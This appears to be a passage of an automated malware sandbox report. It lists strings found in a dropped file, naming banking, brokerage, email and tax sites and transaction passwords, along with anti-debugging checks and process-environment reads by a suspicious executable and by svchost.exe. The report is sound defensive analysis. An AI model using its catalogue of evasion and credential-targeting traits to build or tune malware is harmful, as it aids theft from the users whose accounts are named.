            Source: F56GKLK7U4.6.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: F56GKLK7U4.6.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: F56GKLK7U4.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: F56GKLK7U4.6.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: F56GKLK7U4.6.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: F56GKLK7U4.6.dr Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604198582.00000000011AF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
            Source: F56GKLK7U4.6.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: F56GKLK7U4.6.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: F56GKLK7U4.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: F56GKLK7U4.6.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: F56GKLK7U4.6.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: firefox.exe, 0000000F.00000002.2638871506.000002E5BC09C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz
            Source: C:\Users\user\Desktop\CCE 30411252024.exe API call chain: ExitProcess graph end node graph_0-93213
            Source: C:\Users\user\Desktop\CCE 30411252024.exe API call chain: ExitProcess graph end node graph_0-93788
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0357096E rdtsc 2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417823 LdrLoadDll, 2_2_00417823
            Source: C:\Users\user\Desktop\CCE 30411252024.exe Code function: 0_2_00F36AAF BlockInput, 0_2_00F36AAF
            Source: C:\Users\user\Desktop\CCE 30411252024.exe Code function: 0_2_00EE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00EE3D19
            Source: C:\Users\user\Desktop\CCE 30411252024.exe Code function: 0_2_00F13920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00F13920
            Source: C:\Users\user\Desktop\CCE 30411252024.exe Code function: 0_2_00EFE01E LoadLibraryA,GetProcAddress, 0_2_00EFE01E
            Source: C:\Users\user\Desktop\CCE 30411252024.exe Code function: 0_2_01059188 mov eax, dword ptr fs:[00000030h] 0_2_01059188
            Source: C:\Users\user\Desktop\CCE 30411252024.exe Code function: 0_2_010591E8 mov eax, dword ptr fs:[00000030h] 0_2_010591E8
            Source: C:\Users\user\Desktop\CCE 30411252024.exe Code function: 0_2_01057B48 mov eax, dword ptr fs:[00000030h] 0_2_01057B48
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h] 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h] 2_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h] 2_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h] 2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D437C mov eax, dword ptr fs:[00000030h] 2_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h] 2_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h] 2_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h] 2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h] 2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h] 2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h] 2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h] 2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h] 2_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] 2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] 2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] 2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h] 2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h] 2_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035663FF mov eax, dword ptr fs:[00000030h] 2_2_035663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] 2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] 2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] 2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] 2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] 2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] 2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] 2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h] 2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h] 2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h] 2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h] 2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h] 2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h] 2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h] 2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h] 2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h] 2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h] 2_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03536259 mov eax, dword ptr fs:[00000030h] 2_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h] 2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h] 2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h] 2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h] 2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h] 2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h] 2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352826B mov eax, dword ptr fs:[00000030h] 2_2_0352826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352823B mov eax, dword ptr fs:[00000030h] 2_2_0352823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h] 2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h] 2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h] 2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h] 2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h] 2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h] 2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h] 2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h] 2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h] 2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h] 2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h] 2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h] 2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h] 2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h] 2_2_0352C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h] 2_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h] 2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h] 2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h] 2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h] 2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h] 2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h] 2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h] 2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h] 2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h] 2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h] 2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h] 2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h] 2_2_035F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03560124 mov eax, dword ptr fs:[00000030h] 2_2_03560124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h] 2_2_036061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h] 2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h] 2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h] 2_2_035601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h] 2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h] 2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h] 2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h] 2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h] 2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h] 2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h] 2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03570185 mov eax, dword ptr fs:[00000030h] 2_2_03570185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h] 2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h] 2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h] 2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h] 2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03532050 mov eax, dword ptr fs:[00000030h] 2_2_03532050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h] 2_2_035B6050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h] 2_2_0355C073
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h] 2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h] 2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h] 2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h] 2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h] 2_2_035B4000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] 2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] 2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] 2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] 2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] 2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] 2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] 2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h] 2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h] 2_2_035C6030
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h] 2_2_0352A020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h] 2_2_0352C020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h] 2_2_035B20DE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0352C0F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h] 2_2_035720F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0352A0E3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h] 2_2_035380E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h] 2_2_035B60E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0353208A mov eax, dword ptr fs:[00000030h] 2_2_0353208A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h] 2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h] 2_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03530750 mov eax, dword ptr fs:[00000030h] 2_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h] 2_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h] 2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03572750 mov eax, dword ptr fs:[00000030h] 2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h] 2_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356674D mov esi, dword ptr fs:[00000030h] 2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h] 2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356674D mov eax, dword ptr fs:[00000030h] 2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03538770 mov eax, dword ptr fs:[00000030h] 2_2_03538770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03540770 mov eax, dword ptr fs:[00000030h] 2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03530710 mov eax, dword ptr fs:[00000030h] 2_2_03530710
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03560710 mov eax, dword ptr fs:[00000030h] 2_2_03560710
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h] 2_2_0356C700
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h] 2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h] 2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356273C mov eax, dword ptr fs:[00000030h] 2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h] 2_2_035AC730
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h] 2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h] 2_2_0356C720
